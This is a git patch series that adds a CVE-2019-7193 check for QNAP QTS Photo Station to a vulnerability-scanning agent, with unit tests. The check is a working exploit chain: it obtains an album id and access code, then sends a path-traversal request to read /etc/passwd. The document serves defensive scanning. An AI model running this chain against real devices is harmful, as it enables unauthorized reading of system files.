From af6629e51ed02f180b11938cc48caff688559cd4 Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:13:13 +0100 Subject: [PATCH 01/10] - CVE-2019-7193 - Change unit test titles --- agent/exploits/cve_2019_7193.py | 116 ++++++++++++++++++++++++++++++++ tests/exploits_test.py | 40 ++++++++++- 2 files changed, 154 insertions(+), 2 deletions(-) create mode 100644 agent/exploits/cve_2019_7193.py diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py new file mode 100644 index 00000000..8df9fde1 --- /dev/null +++ b/agent/exploits/cve_2019_7193.py @@ -0,0 +1,116 @@ +"""Agent Asteroid implementation for CVE-2021-22941""" +import re + +import requests +from ostorlab.agent.kb import kb +from ostorlab.agent.mixins import agent_report_vulnerability_mixin +from requests import exceptions as requests_exceptions + +from agent import definitions +from agent import exploits_registry + +VULNERABILITY_TITLE = "This improper input validation vulnerability in QNAP QTS" +VULNERABILITY_REFERENCE = "CVE-2019-7193" +VULNERABILITY_DESCRIPTION = ( + "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " + "To fix the vulnerability, QNAP recommend updating QTS to their latest versions." +) + +DEFAULT_TIMEOUT = 90 +HEADERS = {"User-Agent": "Gundy - QNAP RCE"} +TARGET_FILE = "./../../../../../etc/passwd" + + +@exploits_registry.register +class CVE20197193Exploit(definitions.Exploit): + """ + CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller + """ + + def accept(self, target: definitions.Target) -> bool: + target_uri = f"{target.scheme}://{target.host}:{target.port}" + try: + req = requests.get( + target_uri + "/cgi-bin/", verify=False, timeout=DEFAULT_TIMEOUT + ) + except requests_exceptions.RequestException: + return False + return req.status_code == 200 + + def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: + target_uri = f"{target.scheme}://{target.host}:{target.port}" + session = requests.Session() + + req = session.post( + target_uri + "/photo/p/api/album.php", + data={"a": "setSlideshow", "f": "qsamplealbum"}, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if req.status_code != 200: + return [] + album_id = re.search("(?<=).*?(?=)", req.text).group() + + req = session.get( + target_uri + "/photo/slideshow.php?album=" + album_id, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if req.status_code != 200: + return [] + access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text).group() + + post_data = { + "album": album_id, + "a": "caption", + "ac": access_code, + "f": "UMGObv", + "filename": TARGET_FILE, + } + req = session.post( + target_uri + "/photo/p/api/video.php", + data=post_data, + headers=HEADERS, + verify=False, + timeout=DEFAULT_TIMEOUT, + ) + if b"/bin/sh" not in req.content: + return [] + + vulnerability = self._generate_vulnerability_object(target_uri) + return [vulnerability] + + def _generate_vulnerability_object( + self, target_uri: str + ) -> definitions.Vulnerability: + entry = kb.Entry( + title=VULNERABILITY_TITLE, + risk_rating="HIGH", + short_description=VULNERABILITY_DESCRIPTION, + description=VULNERABILITY_DESCRIPTION, + references={ + "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}" + }, + recommendation=( + "- Make sure to install the latest security patches from software vendor \n" + "- Update to the latest software version" + ), + security_issue=True, + privacy_issue=False, + has_public_exploit=False, + targeted_by_malware=False, + targeted_by_ransomware=False, + targeted_by_nation_state=False, + ) + technical_detail = ( + f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE}, " + f"{VULNERABILITY_TITLE}" + ) + vulnerability = definitions.Vulnerability( + entry=entry, + technical_detail=technical_detail, + risk_rating=agent_report_vulnerability_mixin.RiskRating.HIGH, + ) + return vulnerability diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 87cdffaa..602a970a 100644 --- a/tests/exploits_test.py +++ b/tests/exploits_test.py @@ -9,11 +9,12 @@ from agent import definitions from agent.exploits import cve_2021_22941 from agent.exploits import cve_2023_27997 +from agent.exploits import cve_2019_7193 seed: int = 0 -def testCVE_2023_27997_whenVulnerable_reportFinding( +def testCVE202327997_whenVulnerable_reportFinding( mocker: plugin.MockerFixture, ) -> None: exploit_instance = cve_2023_27997.CVE202327997Exploit() @@ -48,7 +49,7 @@ def side_effect(*args, **kwargs): # type: ignore[no-untyped-def] assert vulnerability.entry.risk_rating == "HIGH" -def testCVE_2021_22941_whenVulnerable_reportFinding( +def testCVE202122941_whenVulnerable_reportFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: """Unit test for CVE-2021-22941, case when target is vulnerable""" @@ -80,3 +81,38 @@ def testCVE_2021_22941_whenVulnerable_reportFinding( == "https://75.162.65.52 is vulnerable to CVE-2021-22941, Improper Access Control " "in Citrix ShareFile storage zones controller" ) + + +def testCVE20197193_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"xyz", + ) + requests_mock.get( + "https://127.0.0.1:443/photo/slideshow.php?album=xyz", + content=b"encodeURIComponent('abc')", + ) + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/video.php", + content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" + b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" + b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" + b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", + ) + + vulnerabilities = exploit_instance.check(target) + vulnerability = vulnerabilities[0] + + assert ( + vulnerability.entry.title + == "This improper input validation vulnerability in QNAP QTS" + ) + assert ( + vulnerability.technical_detail + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, This improper input validation vulnerability in QNAP QTS" + ) From 158f02b49e5d18952c9ac797489e576281057d4d Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:40:35 +0100 Subject: [PATCH 02/10] Fix unittest --- tests/exploits_registry_test.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/exploits_registry_test.py b/tests/exploits_registry_test.py index 84a23bd9..92df9331 100644 --- a/tests/exploits_registry_test.py +++ b/tests/exploits_registry_test.py @@ -12,7 +12,7 @@ def testExploitsRegistry_importingAllExploits_registerAll() -> None: registered_exploits = exploits_registry.ExploitsRegistry.values() - assert len(registered_exploits) == 2 + assert len(registered_exploits) == 3 def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None: From 38058d4c73d43b9a04cede995e34a4ba3f9f09b5 Mon Sep 17 00:00:00 2001 From: ostorlab Date: Wed, 22 Nov 2023 17:56:34 +0100 Subject: [PATCH 03/10] Fix linting --- agent/exploits/cve_2019_7193.py | 13 +++++++++++-- tests/exploits_test.py | 3 ++- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 8df9fde1..34bb6920 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -41,6 +41,7 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: target_uri = f"{target.scheme}://{target.host}:{target.port}" session = requests.Session() + # Get album id req = session.post( target_uri + "/photo/p/api/album.php", data={"a": "setSlideshow", "f": "qsamplealbum"}, @@ -50,8 +51,12 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: ) if req.status_code != 200: return [] - album_id = re.search("(?<=).*?(?=)", req.text).group() + album_match = re.search("(?<=).*?(?=)", req.text) + if album_match is None: + return [] + album_id = album_match.group() + # Get access code req = session.get( target_uri + "/photo/slideshow.php?album=" + album_id, headers=HEADERS, @@ -60,8 +65,12 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: ) if req.status_code != 200: return [] - access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text).group() + access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text) + if access_match is None: + return [] + access_code = access_match.group() + # Read local file post_data = { "album": album_id, "a": "caption", diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 602a970a..6b94c484 100644 --- a/tests/exploits_test.py +++ b/tests/exploits_test.py @@ -114,5 +114,6 @@ def testCVE20197193_whenVulnerable_reportFinding( ) assert ( vulnerability.technical_detail - == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, This improper input validation vulnerability in QNAP QTS" + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " + "This improper input validation vulnerability in QNAP QTS" ) From d7c13173d4a5784bb678f6ff4e0ac70b6fd4c9f9 Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 09:00:43 +0100 Subject: [PATCH 04/10] Update CVE --- agent/exploits/cve_2019_7193.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 34bb6920..786eea1b 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -1,4 +1,4 @@ -"""Agent Asteroid implementation for CVE-2021-22941""" +"""Agent Asteroid implementation for CVE-2019-7193""" import re import requests From b9bac475e6cbd75d3db4b62c9c44be080d75547a Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 10:09:06 +0100 Subject: [PATCH 05/10] Address comments --- agent/exploits/cve_2019_7193.py | 43 +++++++++++++++++---------------- tests/cve_2019_7193_test.py | 41 +++++++++++++++++++++++++++++++ tests/exploits_test.py | 37 ---------------------------- 3 files changed, 63 insertions(+), 58 deletions(-) create mode 100644 tests/cve_2019_7193_test.py diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 786eea1b..6b5d6f83 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -30,42 +30,42 @@ class CVE20197193Exploit(definitions.Exploit): def accept(self, target: definitions.Target) -> bool: target_uri = f"{target.scheme}://{target.host}:{target.port}" try: - req = requests.get( + resp = requests.get( target_uri + "/cgi-bin/", verify=False, timeout=DEFAULT_TIMEOUT ) except requests_exceptions.RequestException: return False - return req.status_code == 200 + return resp.status_code == 200 def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: target_uri = f"{target.scheme}://{target.host}:{target.port}" session = requests.Session() # Get album id - req = session.post( + resp = session.post( target_uri + "/photo/p/api/album.php", data={"a": "setSlideshow", "f": "qsamplealbum"}, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if req.status_code != 200: + if resp.status_code != 200: return [] - album_match = re.search("(?<=).*?(?=)", req.text) + album_match = re.search("(?<=).*?(?=)", resp.text) if album_match is None: return [] album_id = album_match.group() # Get access code - req = session.get( + resp = session.get( target_uri + "/photo/slideshow.php?album=" + album_id, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if req.status_code != 200: + if resp.status_code != 200: return [] - access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", req.text) + access_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", resp.text) if access_match is None: return [] access_code = access_match.group() @@ -78,29 +78,30 @@ def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: "f": "UMGObv", "filename": TARGET_FILE, } - req = session.post( + resp = session.post( target_uri + "/photo/p/api/video.php", data=post_data, headers=HEADERS, verify=False, timeout=DEFAULT_TIMEOUT, ) - if b"/bin/sh" not in req.content: + if b"/bin/sh" not in resp.content: return [] - vulnerability = self._generate_vulnerability_object(target_uri) + vulnerability = self._create_vulnerability(target_uri) return [vulnerability] - def _generate_vulnerability_object( - self, target_uri: str - ) -> definitions.Vulnerability: + def _create_vulnerability(self, target_uri: str) -> definitions.Vulnerability: entry = kb.Entry( title=VULNERABILITY_TITLE, - risk_rating="HIGH", + risk_rating="CRITICAL", short_description=VULNERABILITY_DESCRIPTION, description=VULNERABILITY_DESCRIPTION, references={ - "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}" + "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}", + "qnap.com": "https://www.qnap.com/en-us/security-advisory/nas-201911-25", + "packetstormsecurity.com": "https://packetstormsecurity.com/files/157857/" + "QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html", }, recommendation=( "- Make sure to install the latest security patches from software vendor \n" @@ -108,10 +109,10 @@ def _generate_vulnerability_object( ), security_issue=True, privacy_issue=False, - has_public_exploit=False, - targeted_by_malware=False, - targeted_by_ransomware=False, - targeted_by_nation_state=False, + has_public_exploit=True, + targeted_by_malware=True, + targeted_by_ransomware=True, + targeted_by_nation_state=True, ) technical_detail = ( f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE}, " @@ -120,6 +121,6 @@ def _generate_vulnerability_object( vulnerability = definitions.Vulnerability( entry=entry, technical_detail=technical_detail, - risk_rating=agent_report_vulnerability_mixin.RiskRating.HIGH, + risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL, ) return vulnerability diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py new file mode 100644 index 00000000..353eb2e7 --- /dev/null +++ b/tests/cve_2019_7193_test.py @@ -0,0 +1,41 @@ +"""Unit tests for CVE-2019-7193""" +import requests_mock as req_mock +from agent.exploits import cve_2019_7193 +from agent import definitions + + +def testCVE20197193_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"xyz", + ) + requests_mock.get( + "https://127.0.0.1:443/photo/slideshow.php?album=xyz", + content=b"encodeURIComponent('abc')", + ) + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/video.php", + content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" + b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" + b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" + b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", + ) + + vulnerabilities = exploit_instance.check(target) + vulnerability = vulnerabilities[0] + + assert ( + vulnerability.entry.title + == "This improper input validation vulnerability in QNAP QTS" + ) + assert ( + vulnerability.technical_detail + == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " + "This improper input validation vulnerability in QNAP QTS" + ) + assert vulnerability.risk_rating.name == "CRITICAL" diff --git a/tests/exploits_test.py b/tests/exploits_test.py index 6b94c484..02ea113f 100644 --- a/tests/exploits_test.py +++ b/tests/exploits_test.py @@ -9,7 +9,6 @@ from agent import definitions from agent.exploits import cve_2021_22941 from agent.exploits import cve_2023_27997 -from agent.exploits import cve_2019_7193 seed: int = 0 @@ -81,39 +80,3 @@ def testCVE202122941_whenVulnerable_reportFinding( == "https://75.162.65.52 is vulnerable to CVE-2021-22941, Improper Access Control " "in Citrix ShareFile storage zones controller" ) - - -def testCVE20197193_whenVulnerable_reportFinding( - requests_mock: req_mock.mocker.Mocker, -) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" - target = definitions.Target(scheme="https", host="127.0.0.1", port=443) - exploit_instance = cve_2019_7193.CVE20197193Exploit() - requests_mock.post( - "https://127.0.0.1:443/photo/p/api/album.php", - content=b"xyz", - ) - requests_mock.get( - "https://127.0.0.1:443/photo/slideshow.php?album=xyz", - content=b"encodeURIComponent('abc')", - ) - requests_mock.post( - "https://127.0.0.1:443/photo/p/api/video.php", - content=b"admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh" - b"guest:x:65534:65534:guest:/share/homes/guest:/bin/sh" - b"httpdusr:x:99:0:Apache httpd user:/tmp:/bin/sh" - b"[sshd]:x:110:65534:SSHD Privilege Separation:/var/empty:/bin/sh", - ) - - vulnerabilities = exploit_instance.check(target) - vulnerability = vulnerabilities[0] - - assert ( - vulnerability.entry.title - == "This improper input validation vulnerability in QNAP QTS" - ) - assert ( - vulnerability.technical_detail - == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " - "This improper input validation vulnerability in QNAP QTS" - ) From 4a81b7ac1e00230b7611dfc3ea206b547683c26f Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 11:37:59 +0100 Subject: [PATCH 06/10] Address comments --- agent/exploits/cve_2019_7193.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index 6b5d6f83..d2aa1282 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -9,7 +9,7 @@ from agent import definitions from agent import exploits_registry -VULNERABILITY_TITLE = "This improper input validation vulnerability in QNAP QTS" +VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability " VULNERABILITY_REFERENCE = "CVE-2019-7193" VULNERABILITY_DESCRIPTION = ( "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " @@ -24,7 +24,7 @@ @exploits_registry.register class CVE20197193Exploit(definitions.Exploit): """ - CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller + CVE-2019-7193: QNAP QTS Improper Input Validation Vulnerability """ def accept(self, target: definitions.Target) -> bool: From cc8f951fa8f469d15db0d52cc4f60727a81354bb Mon Sep 17 00:00:00 2001 From: ostorlab Date: Thu, 23 Nov 2023 11:48:40 +0100 Subject: [PATCH 07/10] Address comments --- agent/exploits/cve_2019_7193.py | 2 +- tests/cve_2019_7193_test.py | 21 ++++++++++++++++++--- 2 files changed, 19 insertions(+), 4 deletions(-) diff --git a/agent/exploits/cve_2019_7193.py b/agent/exploits/cve_2019_7193.py index d2aa1282..05d15b83 100644 --- a/agent/exploits/cve_2019_7193.py +++ b/agent/exploits/cve_2019_7193.py @@ -9,7 +9,7 @@ from agent import definitions from agent import exploits_registry -VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability " +VULNERABILITY_TITLE = "QNAP QTS Improper Input Validation Vulnerability" VULNERABILITY_REFERENCE = "CVE-2019-7193" VULNERABILITY_DESCRIPTION = ( "This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. " diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 353eb2e7..5ccdff1b 100644 --- a/tests/cve_2019_7193_test.py +++ b/tests/cve_2019_7193_test.py @@ -30,12 +30,27 @@ def testCVE20197193_whenVulnerable_reportFinding( vulnerability = vulnerabilities[0] assert ( - vulnerability.entry.title - == "This improper input validation vulnerability in QNAP QTS" + vulnerability.entry.title == "QNAP QTS Improper Input Validation Vulnerability" ) assert ( vulnerability.technical_detail == "https://127.0.0.1:443 is vulnerable to CVE-2019-7193, " - "This improper input validation vulnerability in QNAP QTS" + "QNAP QTS Improper Input Validation Vulnerability" ) assert vulnerability.risk_rating.name == "CRITICAL" + + +def testCVE20197193_whenSafe_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """Unit test for CVE-2019-7193, case when target is vulnerable""" + target = definitions.Target(scheme="https", host="127.0.0.1", port=443) + exploit_instance = cve_2019_7193.CVE20197193Exploit() + requests_mock.post( + "https://127.0.0.1:443/photo/p/api/album.php", + content=b"Invalid Request", + ) + + vulnerabilities = exploit_instance.check(target) + + assert len(vulnerabilities) == 0 From c9177a9c5fc31a1875506ef0819375073ae57dda Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 14:35:49 +0100 Subject: [PATCH 08/10] Update cve_2019_7193_test.py --- tests/cve_2019_7193_test.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 5ccdff1b..034ce589 100644 --- a/tests/cve_2019_7193_test.py +++ b/tests/cve_2019_7193_test.py @@ -40,7 +40,7 @@ def testCVE20197193_whenVulnerable_reportFinding( assert vulnerability.risk_rating.name == "CRITICAL" -def testCVE20197193_whenSafe_reportFinding( +def testCVE20197193_whenSafe_reportNothing( requests_mock: req_mock.mocker.Mocker, ) -> None: """Unit test for CVE-2019-7193, case when target is vulnerable""" From 9b3843892603503e0b1ff377fa512b4280865ee1 Mon Sep 17 00:00:00 2001 From: Mohamed Benchikh <129080649+BlueSquare1@users.noreply.github.com> Date: Thu, 23 Nov 2023 14:37:16 +0100 Subject: [PATCH 09/10] Update cve_2019_7193_test.py --- tests/cve_2019_7193_test.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/cve_2019_7193_test.py b/tests/cve_2019_7193_test.py index 034ce589..7a1e45a6 100644 --- a/tests/cve_2019_7193_test.py +++ b/tests/cve_2019_7193_test.py @@ -7,7 +7,7 @@ def testCVE20197193_whenVulnerable_reportFinding( requests_mock: req_mock.mocker.Mocker, ) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" + """Unit test for CVE-2019-7193, case when target is vulnerable.""" target = definitions.Target(scheme="https", host="127.0.0.1", port=443) exploit_instance = cve_2019_7193.CVE20197193Exploit() requests_mock.post( @@ -43,7 +43,7 @@ def testCVE20197193_whenVulnerable_reportFinding( def testCVE20197193_whenSafe_reportNothing( requests_mock: req_mock.mocker.Mocker, ) -> None: - """Unit test for CVE-2019-7193, case when target is vulnerable""" + """Unit test for CVE-2019-7193, case when target is safe.""" target = definitions.Target(scheme="https", host="127.0.0.1", port=443) exploit_instance = cve_2019_7193.CVE20197193Exploit() requests_mock.post( From ee5c59952e42b7e05426baa6c8ea8561b8d1c70b Mon Sep 17 00:00:00 2001 From: ostorlab Date: Fri, 24 Nov 2023 10:22:14 +0100 Subject: [PATCH 10/10] Address conflict --- tests/{ => exploits}/cve_2019_7193_test.py | 0 tests/exploits_registry_test.py | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename tests/{ => exploits}/cve_2019_7193_test.py (100%) diff --git a/tests/cve_2019_7193_test.py b/tests/exploits/cve_2019_7193_test.py similarity index 100% rename from tests/cve_2019_7193_test.py rename to tests/exploits/cve_2019_7193_test.py diff --git a/tests/exploits_registry_test.py b/tests/exploits_registry_test.py index 92df9331..21427881 100644 --- a/tests/exploits_registry_test.py +++ b/tests/exploits_registry_test.py @@ -12,7 +12,7 @@ def testExploitsRegistry_importingAllExploits_registerAll() -> None: registered_exploits = exploits_registry.ExploitsRegistry.values() - assert len(registered_exploits) == 3 + assert len(registered_exploits) == 4 def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None: